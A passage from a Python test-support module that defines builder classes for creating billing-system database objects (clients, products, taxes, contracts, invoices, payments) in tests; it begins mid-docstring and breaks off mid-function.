etc.\n\nExample:\n >>>invoice = InvoiceBuilder()\n >>>invoice.request.client = Getter(mapper.Client, 299139)\n >>>invoice.request.b.agency_discount_pct = 10\n >>>invoice.request.rows[0][0].product._other.tax = GenericBuilder(mapper.Tax,\n ... product=invoice.request.rows[0][0].product, nds_pct=18, nsp_pct=0,\n ... currency=Getter(Currency, 'RUR'))\n >>> # No session is needed until now\n >>>invoice.build(session)\n\"\"\"\n\nimport datetime\nimport collections\nimport contextlib\nimport os\nimport uuid\nimport random\nimport string\nimport mock\nimport sqlalchemy as sa\nfrom decimal import Decimal as D\nfrom pycron.sqlalchemy_mappers import JobDescr, JobSchedule\n\nfrom butils.decimal_unit import DecimalUnit as DU\nfrom billing.contract_iface import contract_meta\nfrom billing.contract_iface import ContractTypeId\n\nfrom butils.passport import INTRA_MIN, INTRA_MAX\n\nfrom balance import core\nfrom balance import mapper\nfrom balance import exc\nfrom balance import muzzle_util as ut\nfrom balance.actions.invoice_create import InvoiceFactory\nfrom balance.constants import (\n GENERIC_MESSAGE_CREATOR_MESSAGE_OPCODE,\n POSTPAY_PAYMENT_TYPE,\n FirmId,\n ServiceId,\n InvoiceRefundStatus,\n InvoiceTransferStatus,\n NirvanaTaskStatus,\n CONVERT_TYPE_COPY,\n LanguageId,\n OebsOperationType,\n RoleType,\n NirvanaProcessingTaskState,\n PromocodeApplyTypes,\n)\nfrom balance.payments import payments\n\n# Fork-compatible random generator\nRANDOM = random.SystemRandom()\n\n\ndef get_big_number():\n # Should fit in XMLRPC's int4\n return RANDOM.randint(2 ** 25, 2 ** 30)\n\n\ndef _mk_list(obj):\n return list(obj) if isinstance(obj, collections.Iterable) else [obj]\n\n\ndef generate_numeric_string(length=10):\n return str(generate_int(length))\n\n\ndef generate_character_string(length=10):\n return ''.join(RANDOM.choice(string.letters) for _ in range(length))\n\n\ndef generate_int(length=10):\n \"\"\" Generate random int of specified length (in decimal digits) \"\"\"\n assert length > 0\n min_ = 10 ** (length - 1)\n max_ = min_ * 10\n if length == 1:\n min_ = 0\n result = int((max_ - min_) * RANDOM.random())\n return result + min_\n\n\nPAYSYS_ID = 1001 # Bank payment\n\n\nclass BuilderContainer(dict):\n \"\"\"A container for builders.\n Elements can be accessed using container.elem as well as using\n container['elem']. Turns list and tuples in ListBuilders on assignment.\n \"\"\"\n\n def transform_seqs(self):\n for key, val in self.iteritems():\n if isinstance(val, (list, tuple)):\n super(self.__class__, self).__setitem__(key, ListBuilder(*val))\n\n def update(self, *args, **kwargs):\n super(self.__class__, self).update(*args, **kwargs)\n self.transform_seqs()\n\n def __setattr__(self, key, val):\n self[key] = val # call __setitem__\n\n def __getattr__(self, key):\n return self[key]\n\n def __setitem__(self, key, val):\n super(self.__class__, self).__setitem__(key, val)\n # Transform lists and tuples to ListBuilder's\n self.transform_seqs()\n\n def __delattr__(self, key):\n del self[key]\n\n # The dict returned by this method can be passed to database class __init__\n def get_objects(self):\n \"\"\"Get container content with builders replaced with object they\n have built\"\"\"\n return dict((k, (v.obj if isinstance(v, ObjectBuilder) else v))\n for k, v in self.iteritems())\n\n\nclass ObjectBuilder(object):\n \"\"\"Base class for database objects buiders. \"\"\"\n\n # Class of object to build\n _class = None\n _factory_class = None\n\n # Object attributes (simple and builders, no database object). Actual\n # keyword parameters to _class.__init__ are built from it.\n _build_params = None\n\n # Container for any additional objects we want to use\n # from outside OR we need to build.\n _other = None\n\n # Stored instance of built object\n _obj = None\n\n # A flag to indicate that object build process has been started (and maybe\n # completed)\n _build_has_been_started = False\n\n # If this evaluates to true, ObjectBuilder.build() will generate random\n # unique id and assign it to self._build_params.id.\n _generate_id = False\n\n # Access to object attributes for external code\n @property\n def b(self):\n return self._build_params\n\n # Built object getter - redefine in subclasses\n def get_obj(self):\n return self._obj\n\n # Access to built object for external code\n @property\n def obj(self):\n return self.get_obj()\n\n # If key is not found in self.__dict__, return value from\n # self.__build_params\n def __getattr__(self, key):\n return self.b.__getattr__(key)\n\n def __setattr__(self, key, value):\n if not key.startswith('_'):\n raise AttributeError(\n \"Assigning attributes to builder is prohibited. \"\n \"Did you mean to assign to build parameters (.b)?\\n\"\n \":_class=%s, key=%s, value=%s\" % (self._class, key, value))\n self.__dict__[key] = value\n\n def __init__(self, **params):\n self._build_params = BuilderContainer()\n self._other = BuilderContainer()\n self.prepare(**params)\n\n def set_build_params(self, **params):\n \"\"\"Set a batch of attributes\"\"\"\n for key, val in params.iteritems():\n self._build_params[key] = val\n\n def generate_unique_id(self, session, attrib_name, max_attempts=5):\n \"\"\"Generates unique id\"\"\"\n for attempt_num in xrange(max_attempts):\n id = get_big_number()\n id_exists = session.query(sa.literal(True)).filter(\n sa.exists().where(getattr(self._class, attrib_name) == id)\n ).scalar()\n if not id_exists:\n return id\n else:\n raise Exception('Failed {} attempts to generate unique id.'\n .format(max_attempts))\n\n # Main method to redefine in subclasses.\n def prepare(self, **params):\n \"\"\"Set all required attributes and get the object ready for building\"\"\"\n for key, val in params.iteritems():\n self._build_params[key] = val\n\n def postprocess(self):\n \"\"\"\n update an object after building\n \"\"\"\n pass\n\n def build(self, session):\n \"\"\"Build the object with all parameters and store it internally\"\"\"\n\n # Avoid building more than once\n if self._build_has_been_started:\n return self\n self._build_has_been_started = True\n\n # Generate unique id if needed\n if self._generate_id:\n self._build_params.id = self.generate_unique_id(session, 'id')\n\n # Build all the parameters\n for key, val in self._build_params.iteritems():\n if isinstance(val, ObjectBuilder):\n val.build(session)\n\n # Build the object\n if self._factory_class:\n self._obj = self._factory_class.create(**self._build_params.get_objects())\n else:\n self._obj = self._class(**self._build_params.get_objects())\n if isinstance(self._obj, (mapper.DomainObject, mapper.DeclarativeBase)):\n session.add(self._obj)\n session.flush()\n self.postprocess()\n for key, val in self._other.iteritems():\n if isinstance(val, ObjectBuilder) and not val._obj:\n val.build(session)\n return self\n\n @classmethod\n def construct(cls, session, **params):\n return cls(**params).build(session).obj\n\n def reset(self):\n \"\"\"Reset this builder and all children to state before build\"\"\"\n self._obj = None\n self._build_has_been_started = False\n for val in self._build_params.itervalues():\n if isinstance(val, ObjectBuilder) and val._build_has_been_started:\n val.reset()\n for val in self._other.itervalues():\n if isinstance(val, ObjectBuilder) and val._build_has_been_started:\n val.reset()\n\n\nclass ListBuilder(ObjectBuilder):\n \"\"\"Replacement of python sequences for builders\"\"\"\n\n def __getitem__(self, index):\n return self.b[index]\n\n def __init__(self, *args):\n super(ListBuilder, self).__init__()\n self._build_params = []\n for elem in args:\n if isinstance(elem, (tuple, list)):\n self._build_params.append(ListBuilder(*elem))\n else:\n self._build_params.append(elem)\n\n def get_obj(self):\n return [(v.obj if isinstance(v, ObjectBuilder) else v)\n for v in self.b]\n\n def build(self, session):\n # Avoid building more than once\n if self._build_has_been_started:\n return self\n self._build_has_been_started = True\n for item in self._build_params:\n if isinstance(item, ObjectBuilder):\n item.build(session)\n return self\n\n def reset(self):\n self._obj = None\n self._build_has_been_started = False\n for val in self._build_params:\n if isinstance(val, ObjectBuilder):\n val.reset()\n\n\nclass Getter(ObjectBuilder):\n \"\"\"\n Class to get things from database by id\n \"\"\"\n\n def __init__(self, _class, _id, **params):\n self._class = _class\n self._id = _id\n super(Getter, self).__init__(**params)\n\n def build(self, session):\n # Avoid building more than once\n if self._build_has_been_started:\n return self\n self._build_has_been_started = True\n self._obj = session.query(self._class).get(self._id)\n for key, val in self._build_params.iteritems():\n if isinstance(val, ObjectBuilder):\n val.build(session)\n for key, val in self._build_params.get_objects().iteritems():\n self._obj.__setattr__(key, val)\n return self\n\n\nclass GenericBuilder(ObjectBuilder):\n def __init__(self, _class, **params):\n self._class = _class\n if _class == mapper.ProdSeasonCoeff:\n self._generate_id = 1\n super(GenericBuilder, self).__init__(**params)\n\n\nclass ConfigBuilder(ObjectBuilder):\n _class = mapper.Config\n\n\nclass TaxBuilder(ObjectBuilder):\n _class = mapper.Tax\n _generate_id = True\n\n def prepare(self, **params):\n tax_policy = params.get(\"tax_policy\", None)\n if tax_policy:\n self.b.tax_policy = tax_policy\n self.b.tax_policy_id = tax_policy.id\n self._other.currency = Getter(mapper.Currency, 'RUR')\n else:\n currency = params.get(\"currency\", None)\n\n if isinstance(currency, mapper.Currency):\n cname = currency.char_code\n elif isinstance(currency, Getter):\n cname = currency._id\n else:\n cname = currency\n if cname:\n assert isinstance(cname, basestring)\n self._other.currency = Getter(mapper.Currency, cname)\n self.b.nds_pct = 0\n self.b.nsp_pct = 0\n if cname == 'RUR':\n self.b.nds_pct = 20\n if cname == 'UAH':\n self.b.nds_pct = 20\n self.b.nsp_pct = 0 # D('0.5')\n\n self.b.hidden = 0\n params.setdefault('dt', datetime.datetime(2001, 1, 1))\n\n super(TaxBuilder, self).prepare(**params)\n\n def build(self, session):\n currency = self._other.currency.build(session).obj\n self.b.iso_currency = currency.iso_code if not self.b.get('iso_currency') else self.b.iso_currency\n self.b.currency = currency\n super(TaxBuilder, self).build(session)\n return self\n\n\nclass TaxesBuilder(ObjectBuilder):\n _class = mapper.Tax\n _generate_id = True\n\n def build(self, session):\n tax_policies = session.query(mapper.TaxPolicy).filter_by(default_tax=1, hidden=0).all()\n for tax_policy in tax_policies:\n tax = TaxBuilder(tax_policy=tax_policy, product=self.b.product)\n tax.build(session)\n\n\nclass ThirpartyServiceBuilder(ObjectBuilder):\n _class = mapper.ThirdPartyService\n\n def prepare(self, **params):\n self.b.id = params['id']\n self.b.agent_scheme = params.pop('agent_scheme', 0)\n\n\nclass ServiceBuilder(ObjectBuilder):\n _class = mapper.Service\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime.now()\n self.b.fiscal_service = mapper.FiscalService()\n self.b.balance_service = mapper.BalanceService()\n\n self.b.balance_service.contract_needed_agency = params.pop('contract_needed_agency', 0)\n self.b.balance_service.client_only = params.pop('client_only', None)\n self.b.balance_service.unilateral = params.pop('unilateral', None)\n self.b.balance_service.extra_pay = 0\n self.b.balance_service.in_contract = 1\n self.b.balance_service.intern = 0\n self.b.balance_service.is_auto_completion = 0\n self.b.balance_service.media = 1\n self.b.balance_service.contract_needed_client = params.pop('contract_needed_client', 1)\n self.b.balance_service.is_spendable = params.pop('is_spendable', 0)\n self.b.balance_service.url_orders = params.pop('url_orders', None)\n self.b.balance_service.show_to_user = params.pop('show_to_user', 2)\n self.b.balance_service.show_to_external_user = 1\n self.b.balance_service.send_invoices = 1\n self.b.balance_service.partner_income = params.pop('partner_income', 0)\n self._other.allowed_agency_without_contract = params.pop('allowed_agency_without_contract', 0)\n super(ServiceBuilder, self).prepare(**params)\n\n def build(self, session):\n self.b.allowed_agency_without_contract = self._other.allowed_agency_without_contract\n if 'id' not in self.b:\n self.b.id = self.generate_unique_id(session, 'id')\n return super(ServiceBuilder, self).build(session)\n\n\nclass ThirdpartyServiceBuilder(ObjectBuilder):\n _class = mapper.ThirdPartyService\n\n def prepare(self, **params):\n self.b.enabled = params.get('enabled', 1)\n super(ThirdpartyServiceBuilder, self).prepare(**params)\n\n\nclass ClientBuilder(ObjectBuilder):\n _class = mapper.Client\n\n def __init__(self, with_single_account=False, **params):\n super(ClientBuilder, self).__init__(**params)\n self._with_single_account = with_single_account\n\n def prepare(self, **params):\n self.b.name = 'test'\n self.b.email = \"test@test.ru\"\n super(ClientBuilder, self).prepare(**params)\n\n def build(self, session):\n if self._with_single_account:\n self.b.creation_dt = self.b.get('creation_dt', session.config.SINGLE_ACCOUNT_MIN_CLIENT_DT)\n\n result = super(ClientBuilder, self).build(session)\n\n if self._with_single_account:\n from balance.actions.single_account.prepare import process_client\n process_client(self.obj)\n\n return result\n\n\nclass CorrectionTemplateGroupBuilder(ObjectBuilder):\n _class = mapper.CorrectionTemplateGroup\n\n def prepare(self, **params):\n self.b.id = generate_int(4)\n self.b.title = generate_character_string(16)\n self.b.items = params.get('items') or []\n super(CorrectionTemplateGroupBuilder, self).prepare(**params)\n\n\nclass GroupBuilder(ObjectBuilder):\n _class = mapper.Group\n\n\nclass EmailMessageBuilder(ObjectBuilder):\n _class = mapper.EmailMessage\n\n def build(self, session):\n return super(EmailMessageBuilder, self).build(session)\n\n def prepare(self, **params):\n self.b.opcode = GENERIC_MESSAGE_CREATOR_MESSAGE_OPCODE\n self.b.object_id = get_big_number()\n self.b.recepient_name = 'recepient_name'\n self.b.recepient_address = 'test@email.ru'\n if 'data' in params:\n self.b.data = params['data']\n super(EmailMessageBuilder, self).prepare(**params)\n\n\nclass PassportBuilder(ObjectBuilder):\n _class = mapper.Passport\n\n def prepare(self, **params):\n self.b.gecos = \"Pupkin pup\"\n self.b.email = \"test@test.ru\"\n self.b.avatar = \"0/0-0\"\n self.b.client = params.get('client')\n self.b.simple_client = params.get('simple_client')\n super(PassportBuilder, self).prepare(**params)\n\n def build(self, session):\n if not hasattr(self.b, 'passport_id'):\n self.b.passport_id = self.generate_unique_id(session, 'passport_id')\n if not hasattr(self.b, 'login'):\n self.b.login = \"testlogin\" + str(self.b.passport_id)\n return super(PassportBuilder, self).build(session)\n\n\nCURRENCY_TO_TAX_POLICY_ID_MAP = {\n 'USD': 21,\n 'RUR': 281,\n 'EUR': 8,\n 'UAH': 5,\n 'TRY': 22,\n 'CHF': 8\n}\n\n\nclass SimplePriceBuilder(ObjectBuilder):\n _class = mapper.Price\n _generate_id = True\n\n def prepare(self, **params):\n self._other.currency = Getter(mapper.Currency, params.pop('currency_code'))\n self.b.price = 100\n super(SimplePriceBuilder, self).prepare(**params)\n\n def build(self, session):\n currency = self._other.currency.build(session).obj\n self.b.iso_currency = currency.iso_code\n self.b.currency = currency\n super(SimplePriceBuilder, self).build(session)\n\n return self\n\n\nclass PlaceBuilder(ObjectBuilder):\n _class = mapper.Place\n _generate_id = True\n\n def prepare(self, **params):\n self.b.type = 2\n self.b.internal_type = 0\n self.b.url='url_{}'.format(generate_character_string(3))\n super(self.__class__, self).prepare(**params)\n\n\nclass MkbCategoryBuilder(ObjectBuilder):\n _class = mapper.MkbCategory\n _generate_id = True\n\n def prepare(self, **params):\n self.b.name = generate_character_string(10)\n self.b.price = RANDOM.randint(10, 1000)\n self.b.unit_id = 799\n self.b.nds = 1\n super(self.__class__, self).prepare(**params)\n\n\nclass PriceBuilder(ObjectBuilder):\n \"\"\"Test price builder\"\"\"\n _class = mapper.Price\n _generate_id = True\n\n def prepare(self, **params):\n self.b.dt = datetime.datetime(2001, 1, 1)\n self.b.tax = 1\n currency_code = params.pop('currency', 'RUR')\n currency = Getter(mapper.Currency, currency_code) if isinstance(currency_code, basestring) else currency_code\n self._other.currency = currency\n self.b.price = params.pop('price', None) or 100\n self.b.product = None\n\n super(PriceBuilder, self).prepare(**params)\n\n def build(self, session):\n currency = self._other.currency.build(session).obj\n self.b.iso_currency = currency.iso_code if not self.b.get('iso_currency') else self.b.iso_currency\n self.b.currency = currency\n super(PriceBuilder, self).build(session)\n if self.obj.tax:\n tax_policy_pct_id = CURRENCY_TO_TAX_POLICY_ID_MAP.get(self.b.currency.char_code, 1)\n self.obj.tax_policy_pct = session.query(mapper.TaxPolicyPct).getone(tax_policy_pct_id)\n\n return self\n\n\nclass ContractBuilder(ObjectBuilder):\n _class = mapper.Contract\n\n def prepare(self, **params):\n from billing.contract_iface import contract_meta\n\n ctype = params.pop('ctype', 'GENERAL')\n contract_params = dict(\n client=params.pop('client', ClientBuilder()),\n external_id=params.pop('external_id', 'test/test'),\n is_process_taxi_netting_in_oebs_=params.pop('is_process_taxi_netting_in_oebs_', None),\n cpf_netting_last_dt=params.pop('cpf_netting_last_dt', None),\n ctype=contract_meta.ContractTypes(type=ctype),\n )\n person = params.pop('person', PersonBuilder(client=contract_params['client']))\n if person:\n contract_params['person'] = person\n\n super(self.__class__, self).prepare(**contract_params)\n\n if params.get('dt', None) is None:\n # if dt is not present or explicitly None we use default\n params['dt'] = datetime.datetime.now() - datetime.timedelta(10)\n params.setdefault('finish_dt', datetime.datetime.now() + datetime.timedelta(10))\n if ctype == 'GENERAL':\n params.setdefault('commission', ContractTypeId.NON_AGENCY)\n params.setdefault('payment_type', POSTPAY_PAYMENT_TYPE)\n params.setdefault('is_signed', datetime.datetime.now())\n\n self._collateral_params = params\n\n def build(self, session):\n import importlib\n\n try:\n contract_attributes = importlib.import_module(\n 'billing.contract_iface.cmeta.%s' % self.obj.type.lower()).contract_attributes\n except (ImportError, AttributeError):\n contract_attributes = None\n\n super(ContractBuilder, self).build(session)\n\n if self._collateral_params.get('manager_code') is None:\n manager = SingleManagerBuilder.construct(session, login='login_{}'.format(generate_int(4)))\n self._collateral_params['manager_code'] = manager.manager_code\n\n if self._collateral_params.get('services') is None:\n service = ServiceBuilder.construct(session)\n self._collateral_params['services'] = service.id\n\n collateral_column_names = [c.name for c in list(mapper.ContractCollateral.__table__.columns)]\n\n for attribute, value in self._collateral_params.iteritems():\n if isinstance(value, ObjectBuilder):\n value = value.build(session).obj\n if attribute.lower() == 'collaterals':\n for col in value:\n dt = col.pop('dt', None) or ut.trunc_date(datetime.datetime.now())\n collateral_type_id = col.pop('collateral_type_id', None)\n col_type = contract_meta.collateral_types[self.obj.ctype.type][collateral_type_id]\n self.obj.append_collateral(dt, col_type, **col)\n continue\n attr_meta = contract_attributes.get(attribute.upper(), None) if contract_attributes else None\n if attribute in collateral_column_names or attr_meta is None:\n setattr(self.obj.col0, attribute, value)\n else:\n attr_meta.todb(self.obj.col0, attribute.upper(), value)\n\n session.flush()\n return self\n\n\nclass CollateralBuilder(ObjectBuilder):\n _class = mapper.ContractCollateral\n\n def prepare(self, **params):\n # each collateral must have a dt\n self.b.dt = params.pop('dt', None) or datetime.datetime.now()\n super(CollateralBuilder, self).prepare(**params)\n\n\nclass ContractPDFEmailBuilder(ObjectBuilder):\n _class = mapper.ContractPDFEmail\n\n\nclass CRPaymentReportBuilder(ObjectBuilder):\n _class = mapper.CRPaymentReport\n\n def prepare(self, **params):\n self.b.contract = params.pop('contract', ContractBuilder())\n self.b.start_dt = params.pop('start_dt', datetime.datetime.now())\n self.b.end_dt = params.pop('end_dt', datetime.datetime.now() + datetime.timedelta(days=7))\n self.b.nach_amount = params.pop('nach_amount', D('1.23'))\n self.b.perech_amount = params.pop('perech_amount', D('6.66'))\n self.b.avans_amount = params.pop('avans_amount', D('9.99'))\n super(CRPaymentReportBuilder, self).prepare(**params)\n\n\nclass YandexMoneyPaymentBuilder(ObjectBuilder):\n \"\"\"Test payment builder\"\"\"\n _class = mapper.YandexMoneyPayment\n\n\nclass WebMoneyPaymentBuilder(ObjectBuilder):\n _class = mapper.WebMoneyPaymasterPayment\n\n\nclass CardPaymentBuilder(ObjectBuilder):\n _class = mapper.CardPayment\n\n def prepare(self, **params):\n invoice = params.get('invoice', None)\n if not invoice:\n params['invoice'] = InvoiceBuilder()\n\n super(CardPaymentBuilder, self).prepare(**params)\n\n\nclass TrustApiPaymentBuilder(ObjectBuilder):\n _class = mapper.TrustApiPayment\n\n\nclass CardRegister(ObjectBuilder):\n _class = mapper.CardRegister\n\n\nclass RBSRegisterBuilder(ObjectBuilder):\n _class = mapper.RBSRegister\n\n def prepare(self, **params):\n self.b.register_dt = datetime.datetime.now()\n self.b.amount = D('1')\n super(RBSRegisterBuilder, self).prepare(**params)\n\n\nclass ActivityBuilder(ObjectBuilder):\n _class = mapper.ActivityType\n _generate_id = True\n\n def prepare(self, **params):\n self.b.hidden = 0\n self.b.name = 'Test activity'\n super(ActivityBuilder, self).prepare(**params)\n\n\nclass ProductGroupBuilder(ObjectBuilder):\n \"\"\"Test ProductGroup builder\"\"\"\n _class = mapper.ProductGroup\n _generate_id = True\n\n def prepare(self, **params):\n self.b.discount_id = 0\n super(ProductGroupBuilder, self).prepare(**params)\n\n\nclass ProductBuilder(ObjectBuilder):\n _class = mapper.Product\n _generate_id = True\n\n def prepare(self, **params):\n params.setdefault('name', 'Test Product')\n params.setdefault('product_group', ProductGroupBuilder(\n name='Test Product Group',\n hidden=0,\n discount_id=0\n ))\n\n # 'auction' product unit; required when quantity is not integer\n self.b.unit = params.pop('unit', Getter(mapper.ProductUnit, 0))\n self.b.mdh_id = str(uuid.uuid4())\n if 'taxes' in params:\n taxes = _mk_list(params.pop('taxes'))\n\n def _cr_tax(tax_param):\n tax_param = _mk_list(tax_param)\n if len(tax_param) == 1:\n policy, = tax_param\n dt = datetime.datetime(2000, 1, 1)\n else:\n dt, policy = tax_param\n\n return TaxBuilder(product=self, dt=dt, tax_policy=policy)\n\n self._other.tax = ListBuilder(*map(_cr_tax, taxes))\n elif params.pop('create_taxes', True):\n # This tax keeps RequestOrder.update happy\n self._other.tax = TaxesBuilder(product=self)\n\n if 'prices' in params:\n prices = _mk_list(params.pop('prices'))\n\n def _cr_price(price_param):\n price_param = _mk_list(price_param)\n if len(price_param) == 2:\n currency, price = price_param\n dt = datetime.datetime(2000, 1, 1)\n tax_pct = None\n elif len(price_param) == 3:\n dt, currency, price = price_param\n tax_pct = None\n else:\n dt, currency, price, tax_pct = price_param\n\n return PriceBuilder(\n product=self, currency=currency, dt=dt,\n price=price, tax_policy_pct=tax_pct, tax=None\n )\n\n self._other.price = ListBuilder(*map(_cr_price, prices))\n elif params.pop('create_price', True):\n currency = Getter(mapper.Currency, params.get('currency', 'RUR'))\n self._other.price = PriceBuilder(\n product=self,\n currency=currency,\n price=params.pop('price', None)\n )\n self.b.activity_type = ActivityBuilder()\n\n super(ProductBuilder, self).prepare(**params)\n\n\nclass ProductUnitBuilder(ObjectBuilder):\n _class = mapper.ProductUnit\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.name = 'Test product unit'\n self.b.englishname = 'Test product unit en'\n self.b.type_rate = 10\n self.b.product_type = ProductTypeBuilder()\n self.b.precision = 4\n super(ProductUnitBuilder, self).prepare(**params)\n\n\nclass ProductTypeBuilder(ObjectBuilder):\n _class = mapper.ProductType\n\n def prepare(self, **params):\n self.b.id = get_big_number()\n self.b.cc = generate_character_string()\n self.b.name = generate_character_string()\n\n\nclass PartnerProductBuilder(ObjectBuilder):\n _class = mapper.PartnerProduct\n\n def prepare(self, **params):\n if 'product' in params:\n product = params.pop('product')\n else:\n raise exc.INVALID_PARAM('product')\n\n self.b.service_id = product.engine_id\n self.b.product_id = product.id\n super(PartnerProductBuilder, self).prepare(**params)\n\n\nclass MarkupBuilder(ObjectBuilder):\n _class = mapper.Markup\n\n _generate_id = True\n\n def prepare(self, **params):\n self.b.code = \"Test Markup\"\n super(MarkupBuilder, self).prepare(**params)\n\n\nclass ProductMarkupBuilder(ObjectBuilder):\n _class = mapper.ProductMarkup\n\n _generate_id = True\n\n def prepare(self, **params):\n self.b.pct = 0\n super(ProductMarkupBuilder, self).prepare(**params)\n\n\nclass SingleManagerBuilder(ObjectBuilder):\n _class = mapper.Manager\n\n def prepare(self, **params):\n params.setdefault('hidden', 0)\n params.setdefault('is_sales', 0)\n params.setdefault('is_backoffice', 0)\n params.setdefault('manager_type', 0)\n params.setdefault('firm_id', FirmId.YANDEX_OOO)\n params.setdefault('hidden', 0)\n super(SingleManagerBuilder, self).prepare(**params)\n\n def build(self, session):\n self.b.manager_code = self.generate_unique_id(session, attrib_name='manager_code')\n return super(SingleManagerBuilder, self).build(session)\n\n\nclass ManagerWithChiefsBuilder(ObjectBuilder):\n _class = mapper.Manager\n\n def _get_manager(self, session, number):\n managers = (\n session.query(mapper.Manager)\n )\n managers_with_chiefs = []\n for m in managers:\n try:\n m.chief\n except exc.NOT_FOUND:\n pass\n else:\n managers_with_chiefs.append(m)\n # m.chief порождает слишком много запросов,\n # а пятерых должно хватить.\n if len(managers_with_chiefs) == 5:\n break\n\n return managers_with_chiefs[number]\n\n def prepare(self, **params):\n bp = self.b\n if 'number' not in params:\n bp.number = 0\n super(ManagerWithChiefsBuilder, self).prepare(**params)\n\n def build(self, session):\n \"\"\"\n Trying to fetch manager with chief because of test_contract_notifier.py.\n \"\"\"\n m = self._get_manager(session, self.b.number)\n self._obj = m\n return self\n\n\nclass OrderBuilder(ObjectBuilder):\n \"\"\"Test order builder\"\"\"\n _class = mapper.Order\n\n def prepare(self, **params):\n params.setdefault('client', ClientBuilder())\n params.setdefault('manager', SingleManagerBuilder())\n product_id = params.pop('product_id', None)\n if product_id:\n params.setdefault('product', Getter(mapper.Product, product_id))\n else:\n params.setdefault('product', ProductBuilder())\n params.setdefault('service', Getter(mapper.Service, params.get('service_id', ServiceId.DIRECT)))\n super(OrderBuilder, self).prepare(**params)\n\n def build(self, session):\n self.b.service_order_id = self.generate_unique_id(session,\n 'service_order_id')\n self.b.service_order_id_str = str(uuid.uuid4())\n return super(OrderBuilder, self).build(session)\n\n\nclass BasketItemBuilder(ObjectBuilder):\n \"\"\"Test basket item builder\"\"\"\n _class = mapper.BasketItem\n\n\nclass BasketRegisterRowBuilder(ObjectBuilder):\n _class = mapper.BasketRegisterRow\n\n def prepare(self, **params):\n self.b.ref_invoice = params.pop('ref_invoice')\n self.b.amount = self.b.ref_invoice.amount\n self.b.amount_nds = self.b.ref_invoice.amount_nds\n self.b.amount_nsp = self.b.ref_invoice.amount_nsp\n super(BasketRegisterRowBuilder, self).prepare(**params)\n\n\nclass BasketBuilder(ObjectBuilder):\n \"\"\"Test basket builder\"\"\"\n _class = mapper.Basket\n\n def prepare(self, **params):\n if 'rows' not in params:\n params.setdefault('client', ClientBuilder())\n product = ProductBuilder()\n params['rows'] = [\n BasketItemBuilder(quantity=2, order=OrderBuilder(client=params['client'], product=product),\n desired_discount_pct=0, user_data='1')\n ]\n\n super(BasketBuilder, self).prepare(**params)\n\n\nclass RequestBuilder(ObjectBuilder):\n \"\"\"Test request builder\"\"\"\n _class = mapper.Request\n\n def prepare(self, **params):\n if 'basket' in params:\n self.b.basket = params['basket']\n else:\n self.b.basket = BasketBuilder()\n\n if 'rows' in params:\n raise ut.INVALID_PARAM(\"\"\"Request \"rows\" parameter is obsolete.\"\"\")\n if 'client' in params:\n raise ut.INVALID_PARAM(\"\"\"Request \"client\" parameter is obsolete.\"\"\")\n super(RequestBuilder, self).prepare(**params)\n # If 'rows' was in params, client will be set correctly, too\n if 'client' not in self.b.basket.b:\n try:\n self.b.basket.b.client = self.b.basket.b.rows[0].order.client\n except IndexError:\n # If there is no rows, you probably know what you are doing.\n pass\n\n\nclass PersonBuilder(ObjectBuilder):\n \"\"\"Test person builder\"\"\"\n _class = mapper.Person\n _person_params = {}\n\n def prepare(self, **params):\n self._person_params = params\n super(PersonBuilder, self).prepare(**params)\n\n def build(self, session):\n from billing.contract_iface.cmeta import person\n\n params = self._person_params\n self.b.operator_uid = session.oper_id\n self.b.type = params.get('type', 'ph')\n\n if not {'client', 'client_id'} & set(params.keys()):\n self.b.client = ClientBuilder()\n elif 'client_id' in params:\n self.b.client = Getter(mapper.Client, params.pop('client_id'))\n\n super(PersonBuilder, self).build(session)\n\n attributes = person.attribute_batch\n\n for attr, value in self._person_params.items():\n if isinstance(value, ObjectBuilder):\n value = value.build(session).obj\n attr_meta = attributes.get(attr.upper(), None) if attributes else None\n\n if attr_meta is not None:\n attr_meta.todb(self.obj, attr.upper(), value)\n else:\n setattr(self.obj, attr, value)\n\n return self\n\n\nclass EdoOfferBuilder(ObjectBuilder):\n _class = mapper.EdoOffer\n\n def prepare(self, **params):\n params.setdefault('firm_id', FirmId.YANDEX_OOO)\n params.setdefault('active_start_date', datetime.datetime.now())\n params.setdefault('active_end_date', None)\n params.setdefault('status', 'FRIENDS')\n params.setdefault('blocked', False)\n params.setdefault('default_flag', True)\n params.setdefault('enabled_flag', True)\n params.setdefault('org_orarowid', str(generate_int(25)))\n params.setdefault('inv_orarowid', str(generate_int(25)))\n super(EdoOfferBuilder, self).prepare(**params)\n\n\nclass InvoiceBuilder(ObjectBuilder):\n _class = mapper.Invoice\n _factory_class = InvoiceFactory\n\n def prepare(self, **params):\n client_params = dict()\n if 'client' in params:\n client_params['client'] = params['client']\n elif 'client_id' in params:\n client_params['client_id'] = params['client_id']\n\n params.setdefault('request', RequestBuilder(basket=BasketBuilder(**client_params)))\n params.setdefault('paysys', Getter(mapper.Paysys, params.get('paysys_id', PAYSYS_ID)))\n params.setdefault('status_id', 0)\n params.setdefault('credit', 0)\n params.setdefault('temporary', False)\n super(InvoiceBuilder, self).prepare(**params)\n\n def build(self, session):\n if self.b.get('person') is None:\n if isinstance(self.b.paysys, mapper.Paysys):\n paysys = self.b.paysys\n else:\n paysys = self.b.paysys.build(session).obj\n\n if isinstance(self.b.request, mapper.Request):\n client = self.b.request.client\n else:\n client = self.b.request.b.basket.b.client\n\n self.b.person = PersonBuilder(client=client, type=paysys.category,\n person_category=paysys.person_category)\n return super(InvoiceBuilder, self).build(session)\n\n\nclass OebsCashPaymentFactBuilder(ObjectBuilder):\n _class = mapper.OebsCashPaymentFact\n _generate_id = True\n\n def prepare(self, **params):\n bp = self.b\n\n bp.amount = params['amount']\n bp.operation_type = params.get('operation_type', OebsOperationType.INSERT)\n invoice = params.get('invoice')\n bp.receipt_number = invoice and invoice.external_id or params['receipt_number']\n\n bp.created_by = bp.last_updated_by = -1\n dt = params.pop('dt') if 'dt' in params else None\n dt = dt or datetime.datetime.now()\n bp.creation_date = bp.last_update_date = bp.receipt_date = dt\n\n super(OebsCashPaymentFactBuilder, self).prepare(**params)\n\n\nclass PayOnCreditCase(object):\n def __init__(self, session):\n self.session = session\n\n def pay_on_credit(self, b_basket, contract, paysys=None, with_paystep=False):\n if not isinstance(b_basket, BasketBuilder):\n raise ut.INVALID_PARAM('BasketBuilder expected')\n\n b_request = RequestBuilder(basket=b_basket)\n req = b_request.build(self.session).obj\n\n coreobj = core.Core(self.session)\n if with_paystep:\n invoices = coreobj.create_invoice(\n request_id=req.id,\n paysys_id=paysys.id if paysys else 1000,\n person_id=contract.person.id,\n 